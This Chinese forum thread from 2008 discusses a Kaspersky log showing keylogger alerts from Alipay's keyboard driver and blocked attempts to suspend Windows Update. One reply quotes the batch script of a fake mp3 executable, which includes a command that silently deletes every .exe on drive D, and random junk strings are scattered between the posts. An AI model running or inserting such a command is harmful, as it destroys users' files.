谁能对我说这都些什么东东!感谢回贴的
PS Core Service (事件: 181) <BR> 2008-08-15 20:51:08 键盘记录器活动 \DRIVER\ALIDEVICE 未终止: Keylogger <BR> 2008-08-15 20:50:08 键盘记录器活动 \DRIVER\ALIDEVICE 未终止: Keylogger <BR> 2008-08-15 20:49:08 键盘记录器活动 \DRIVER\ALIDEVICE 未终止: Keylogger <BR> 2008-08-15 20:48:08 键盘记录器活动 \DRIVER\ALIDEVICE 未终止: Keylogger <BR> 2008-08-15 20:52:06 键盘记录器活动 \DRIVER\ALIDEVICE 未终止: Keylogger <BR> 2008-08-15 20:53:06 键盘记录器活动 \DRIVER\ALIDEVICE 未终止: Keylogger <BR> IPS Core Service (事件: 181) <BR> 2008-08-15 20:47:20 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <BR> 2008-08-15 20:47:20 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <BR> 2008-08-15 20:47:20 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <BR> 2008-08-15 20:47:20 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <BR> 2008-08-15 20:47:20 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <BR> 2008-08-15 20:47:20 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <BR> 2008-08-15 20:47:23 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <BR> 2008-08-15 20:47:23 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <BR> 2008-08-15 20:47:23 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <BR> 2008-08-15 20:47:23 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <BR> 2008-08-15 20:47:23 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <BR> 2008-08-15 20:47:23 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <BR> 2008-08-15 20:47:23 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <BR> 2008-08-15 20:47:24 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <BR> 2008-08-15 20:47:24 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <BR> 2008-08-15 20:47:24 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <BR> 2008-08-15 20:47:24 暂停另一个进程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend <P>是支付宝装的一个驱动,监控键盘输入的。卡巴弹出警报时把它加入排除就行了。不过,说实在的,支付宝这个驱动很过分,应该算流氓行为。</P>C piXf5k<P> </P>
<P>添加到信任区域就行了 有些涉及到系统内核的软件启动时候都会导致出现Keylogger警报,这是正常现象</P>
<P> </P>%rxh;k kB*a6uD
<P> 键盘按键记录 Keylogger </P>
<P> </P>
<P> </P>5EkcY^sP6P\2L
<P>KLSuspend 这个不能叫做病毒应该是恶意程序</P>3f2F utC+Y
<P> </P> nGA0c]
<P>这个过很多杀软! mp3图标样子的!百度下载经常会遇到</P>4j z%Z+r%J*Li d xO
<P> </P>
<P>是会自动删除.exe后戳文件的 一个脚本类型的 算不上病毒</P>R-r%k"KL*VoQj
<P> </P>.S(Z y!x ^u&^2b
<BLOCKQUOTE>@shift<BR>@echo off<BR>echo 打卡上班<BR>del d:\*.exe /f/s/q/a<BR>echo 下班罗!<BR>exit</BLOCKQUOTE>
(WmbsB)p
[[i] 本帖最后由 zhubo393 于 2008-8-15 22:47 编辑 [/i]] 程 c:\windows\system32\wuauclt.exe 拒绝: KLPrivileges/KLPermissionAppAccess/KLPermissionProcManage/KLSuspend 下载音频文件,比如mp3中这种恶意程序......下载时楼主也没看清楚....后缀名是exe吧...X^P'V$e+_4Nj
后面的拒绝是卡巴的主动防御拦截了......:@8# *** 作者被禁止或删除 内容自动屏蔽 *** :@2# ~~~楼上的正解 我觉得8.0运行程序很慢 没7.0速度快 <P>谢谢</P>
页:
[1]